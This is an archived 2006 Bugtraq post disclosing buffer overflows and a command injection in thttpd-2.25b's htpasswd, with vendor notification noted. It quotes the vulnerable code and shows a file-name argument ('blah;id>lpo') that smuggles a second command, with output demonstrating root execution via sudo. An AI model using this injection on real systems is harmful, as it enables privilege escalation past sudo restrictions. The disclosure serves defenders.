lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <c2134ab30603051253x5d6b5874ob7769a5cf190c962@mail.gmail.com>
Date: Sun, 5 Mar 2006 15:53:43 -0500
From: "Larry Cashdollar" <lcashdol@...il.com>
To: bugtraq@...urityfocus.com
Subject: htpasswd bufferoverflow and command execution in thttpd-2.25b.


Hello bugtraq,

 I noticed a problem with thttpd-2.25b - Two buffer overflows and
command execution in htpasswd.c. htpasswd is not installed setuid
root, however in some user installations htpasswd might be executed
via sudo. Exploting the above vulnerabilities would allow a
non-priveledged user to circumvent sudo acls for example.

  line 189 strcpy(user,argv[2]);
  line 197 strcpy(l,line);

  line 215&216:
  sprintf(command,"cp %s %s",temp_template,argv[1]);
 system(command);

  If perhaps sudo is being used to limit what commands a user can
execute as www, you could run other commands like so:

  sudo -u www /bin/htpasswd -c "blah;id>lpo" webauth
  sudo -u www /bin/htpasswd "blah;id>lpo" webauth

  larry@mog:~$ sudo /bin/htpasswd -c "blh;id>lp" www
  larry@mog:~$ sudo /bin/htpasswd "blh;id>lp" www
  Changing password for user www
  New password:
  Re-type new password:
  larry@mog:~$ cat lp
  uid=0(root) gid=0(root) groups=0(root)
  larry@mog:~$ sudo id
  We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
  #1) Respect the privacy of others.
  #2) Think before you type.
  #3) With great power comes great responsibility.
  Password:
  Sorry, user larry is not allowed to execute '/usr/bin/id' as root on mog.


 I sent email to the thttpd mailing list, who were quick to respond
and acknowledge the problem.  They said the problem would be resolved
in the next release.


 -- Larry Cashdollar
 http://vapid.dhs.org


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ